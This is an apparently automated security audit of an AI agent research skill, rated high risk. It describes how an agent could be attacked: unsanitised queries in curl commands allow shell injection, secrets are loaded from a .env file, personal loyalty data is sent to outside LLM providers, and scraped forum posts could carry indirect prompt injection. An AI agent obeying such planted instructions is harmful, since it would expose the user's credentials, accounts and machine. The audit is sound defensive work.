Skills
skills/krishagel/geoffrey/research/Gen Agent Trust Hub

research

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGHCREDENTIALS_UNSAFECOMMAND_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTION
Full Analysis
  • [CREDENTIALS_UNSAFE] (HIGH): The skill instructions (e.g., in agents/gemini-researcher.md) explicitly command the agent to source a .env file from a sensitive user directory (~/Library/Mobile Documents/.../secrets/.env) to load API keys. This pattern exposes secrets to the agent's environment and makes them susceptible to theft if the agent process is compromised.\n- [COMMAND_EXECUTION] (HIGH): Multiple agents (gemini-researcher.md, openai-researcher.md, perplexity-researcher.md) utilize shell curl commands to perform API requests. The user or web-provided research query is interpolated directly into the command string (YOUR_QUERY_HERE) without sanitization or escaping, facilitating shell injection attacks that could lead to arbitrary command execution on the host.\n- [DATA_EXFILTRATION] (HIGH): The skill is designed to read highly personal data from preferences.json (loyalty program status, current points balances, and personal preferences) and transmit it to multiple external LLM providers. While functional for the research purpose, this creates a high-impact data flow of PII and financial-adjacent information to third parties.\n- [PROMPT_INJECTION] (HIGH): Category 8 (Indirect Prompt Injection) vulnerability is high. The skill is designed to scrape 'deep' content from forums like Reddit and FlyerTalk (orchestrator.js). Malicious instructions embedded in these external sources could be processed by the agent. Because the agent has access to sensitive files and shell execution, a successful injection could result in credential theft, account compromise, or local system command execution.\n
  • Ingestion points: Web search results and scraped forum content (e.g., Reddit, FlyerTalk) via orchestrator.js.\n
  • Boundary markers: None detected in the shell command templates or LLM prompt structures.\n
  • Capability inventory: File system access (reading .env and preferences.json), network operations via curl, and browser-control for authenticated content.\n
  • Sanitization: No evidence of input escaping, validation, or sanitization before string interpolation into executable commands.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 16, 2026, 05:30 AM